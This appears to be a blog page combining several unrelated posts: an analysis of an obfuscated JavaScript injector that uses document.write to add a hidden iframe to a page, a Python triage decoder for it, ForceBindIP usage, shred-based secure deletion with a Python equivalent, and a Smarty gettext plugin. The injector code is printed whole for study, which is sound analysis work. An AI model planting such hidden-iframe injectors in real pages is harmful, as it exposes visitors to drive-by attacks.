Oldschool javascript malicious code analysis

I found this oldschool piece of poorly obfuscated code while surfing the web. Some time ago I decided to collect this kind of stuff for learning purposes, so here is the first one:

var temp="",i,c=0,out="";
var if_uniq_var="02102008-01";   // marker string, unused by the decoding loop
var str="60!105!102!114!97!109!101!32!115!114!99!61!34!100!111!99!104!101!108!112!49!46!104!116!109!108!34!32!102!114!97!109!101!98!111!114!100!101!114!61!34!48!34!32!115!116!121!108!101!61!34!100!105!115!112!108!97!121!58!110!111!110!101!34!62!60!47!105!102!114!97!109!101!62!";  // payload: decimal character codes separated by '!'
l=str.length;                    // assigned but never used
while(c<=str.length-1)
{
    while(str.charAt(c)!='!')temp=temp+str.charAt(c++);  // collect the digits up to the next '!'
    c++;                                                // skip the '!' separator
    out=out+String.fromCharCode(temp);                  // decode one character from its code
    temp="";
}
document.write(out);             // inject the decoded HTML into the current page

The strange exclamation-delimited string simply decodes to:

<iframe style="display: none;" src="dochelp1.html" width="320" height="240" frameborder="0"></iframe>
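The same decoding can be done outside a browser, which is how you would triage a sample like this without executing it. The script below is an added example, not code from the original post: it re-implements the '!'-separated character-code scheme, pulls such blobs out of a JavaScript snippet, and flags any iframe the decoded HTML hides with an inline display:none style. The obfuscated string is copied from the sample above; the short JavaScript wrapper around it is constructed for the demonstration.

```python
"""Static deobfuscation of '!'-delimited charcode payloads (added example)."""
import re

# The payload exactly as it appears in the sample above.
OBFUSCATED = ("60!105!102!114!97!109!101!32!115!114!99!61!34!100!111!99!104!101!108!112!49!46!"
              "104!116!109!108!34!32!102!114!97!109!101!98!111!114!100!101!114!61!34!48!34!32!"
              "115!116!121!108!101!61!34!100!105!115!112!108!97!121!58!110!111!110!101!34!62!"
              "60!47!105!102!114!97!109!101!62!")

# Constructed stand-in for the injected <script> body: only the part the decoder cares about.
SAMPLE_JS = 'var temp="",i,c=0,out="";\nvar str="' + OBFUSCATED + '";\ndocument.write(out);'

# A run of at least four "digits!" groups inside a JS string literal.
BLOB_RE = re.compile(r'"((?:\d{1,3}!){4,})"')
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
ATTR_RE = re.compile(r'(\w+)\s*=\s*"([^"]*)"')


def decode_charcodes(blob: str, sep: str = "!") -> str:
    """Mirror the sample's loop: split on the separator, map each decimal code to a character."""
    return "".join(chr(int(tok)) for tok in blob.split(sep) if tok)


def extract_charcode_blobs(js: str) -> list[str]:
    """Return every '!'-delimited charcode string literal found in a JavaScript snippet."""
    return BLOB_RE.findall(js)


def iframe_attributes(html: str) -> list[dict[str, str]]:
    """Parse each <iframe ...> opening tag into a lower-cased attribute dict."""
    return [{k.lower(): v for k, v in ATTR_RE.findall(m.group(0))}
            for m in IFRAME_RE.finditer(html)]


def hidden_iframe_sources(html: str) -> list[str]:
    """src of every iframe hidden via inline style, the injection pattern used by this sample."""
    hits = []
    for attrs in iframe_attributes(html):
        style = attrs.get("style", "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            hits.append(attrs.get("src", ""))
    return hits


def triage(js: str) -> list[dict]:
    """Decode every blob in a snippet and report the hidden iframes it would inject."""
    report = []
    for blob in extract_charcode_blobs(js):
        html = decode_charcodes(blob)
        report.append({"decoded": html, "hidden_iframes": hidden_iframe_sources(html)})
    return report


if __name__ == "__main__":
    for entry in triage(SAMPLE_JS):
        print(entry["decoded"])
        print("hidden iframe src:", entry["hidden_iframes"])
```

The decoder reproduces the tag with exactly the src, frameborder and style attributes present in the character codes; anything a page renderer adds on top of that is not in the payload. Feeding a whole harvested script file to triage() gives you the injected markup and the remote document it points at without ever letting the script run.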

So this piece of code simply attaches an invisible frame to the current document. I didn’t find dochelp1.html on the server of the infected website, but after googling for a while I found its contents:

 

The website it tries to redirect you to looks dead. This malware isn’t active anymore, so I cannot investigate further. End of story.

Infected source: www.galeriadla.art.pl

How to run an application on a specified interface?

If you have two interfaces, you can run programs using a chosen one of them (even though Windows selects the default interface based on the metric value). For example, I virtualize Windows 7 and I need the same static IP for it that my host computer uses. That’s fine; in this scenario I can run applications using the VirtualBox NAT adapter (its IP is something like 10.0.2.15). But I’m also a Heroes III gamer and I love to play with my colleagues over the LAN, so there is a need for a second adapter in bridged mode (with an IP like 192.168.x.x).

What can I do?
Amazingly, there is a Windows application that can do that. Simply download ForceBindIP from this site.

Usage is as simple as this:

ForceBindIp -i 10.0.2.15 c:\Windows\System32\mstsc.exe

10.0.2.15 – the IP of the interface to bind to

Remember to pass the full path of the program you’re trying to run!

How to delete a file permanently in Linux?

Most Linux distributions have shred installed already, so it’s really easy to delete a file in a secure manner:

shred -u -z -n 26 topsecret.txt

Meaning of the switches used:

-n [N] Overwrite the file N times. For example, -n 20 will perform twenty passes over the file’s contents.
-u Remove the file after it has been shredded. You’ll probably want this option in most cases.
-z After shredding the file with random bits (ones and zeros), overwrite it once more with only zeros. This is used to hide the fact that the file was shredded.
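To make the three switches concrete, here is an added example (not shred’s own source) that carries out the same overwrite-then-unlink sequence in Python: N passes of random bytes, an optional final pass of zeros, then removal of the file. demo() builds a constructed sample file so the whole thing runs offline. The same caveat that applies to shred applies here: the overwrite only reaches the blocks currently backing the file, so on journaling or copy-on-write filesystems, and on SSDs with wear levelling, old copies of the data can survive.

```python
"""Overwrite-then-unlink secure deletion, modelled on shred -n N -z -u (added example)."""
import os
import secrets
import tempfile

CHUNK = 64 * 1024  # write the file in 64 KiB slices so large files need little memory


def _write_all(fd: int, buf: bytes) -> None:
    """os.write may write fewer bytes than asked; loop until the whole buffer is out."""
    written = 0
    while written < len(buf):
        written += os.write(fd, buf[written:])


def _overwrite_pass(fd: int, size: int, random_data: bool) -> None:
    """One full pass over the file: random bytes (the -n passes) or zeros (the -z pass)."""
    os.lseek(fd, 0, os.SEEK_SET)
    remaining = size
    while remaining > 0:
        n = min(CHUNK, remaining)
        _write_all(fd, secrets.token_bytes(n) if random_data else bytes(n))
        remaining -= n
    os.fsync(fd)  # push the pass to the device before starting the next one


def secure_delete(path: str, passes: int = 26, zero_final: bool = True,
                  remove: bool = True) -> tuple[int, int, bool]:
    """Return (bytes overwritten, total passes performed, whether the file still exists)."""
    size = os.path.getsize(path)
    fd = os.open(path, os.O_WRONLY)
    try:
        for _ in range(passes):          # -n passes
            _overwrite_pass(fd, size, random_data=True)
        if zero_final:                   # -z
            _overwrite_pass(fd, size, random_data=False)
    finally:
        os.close(fd)
    if remove:                           # -u
        os.remove(path)
    return size, passes + (1 if zero_final else 0), os.path.exists(path)


def demo() -> dict:
    """Shred a constructed sample file and report what each switch did."""
    fd, path = tempfile.mkstemp(prefix="topsecret_", suffix=".txt")
    with os.fdopen(fd, "wb") as f:
        f.write(b"constructed secret contents\n" * 100)   # 2800 bytes of constructed data
    size_before = os.path.getsize(path)

    # First run keeps the file (no -u) so the effect of -z can be inspected.
    _, passes_first, _ = secure_delete(path, passes=2, zero_final=True, remove=False)
    with open(path, "rb") as f:
        all_zero = f.read() == bytes(size_before)

    # Second run removes it (-u); a single random pass, no zero pass.
    _, passes_second, exists = secure_delete(path, passes=1, zero_final=False, remove=True)
    return {"size": size_before, "passes_first": passes_first,
            "all_zero_after_z": all_zero, "passes_second": passes_second,
            "exists_after_u": exists}


if __name__ == "__main__":
    print(demo())
```

Running the module prints the report dict; the sample file is gone afterwards, and the intermediate check shows that the -z style pass leaves nothing but zeros where the contents were.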

A Windows GUI alternative is available at http://www.fileshredder.org/.

Smarty gettext with domain support (block t plugin) [deprecated]

Attention! The official gettext plugin for Smarty has had domain support since version 1.1. Check the official repository: https://github.com/smarty-gettext/smarty-gettext.

Description:

This is a modification of the Smarty gettext plugin. It adds domain support and uses the gettext wrapper for PHP (php-gettext).

Why do I use such a wrapper for gettext? It’s simple: not every server has native gettext support, and this crafty script gives you a fallback in case yours does not.

Usage example:

Initialise it before any template is parsed by Smarty:

// include the gettext wrapper for PHP
include('./php-gettext/gettext.inc');

// set the locale
T_setlocale(LC_MESSAGES, 'en_US');

// load the language file
/* loads ./lang/en_US/LC_MESSAGES/example.mo (do not close the path with a final slash) */
T_bindtextdomain('example', './lang');
T_bind_textdomain_codeset('example', 'utf-8'); /* just in case */

// set the default domain
T_textdomain('default');

Smarty syntax example:

{t domain="example"}This text will be translated using gettext domain example.{/t}
{t}This text will be translated using standard gettext domain.{/t}

Installation:

Simply put the file block.t.php into the Smarty plugins directory.

Download: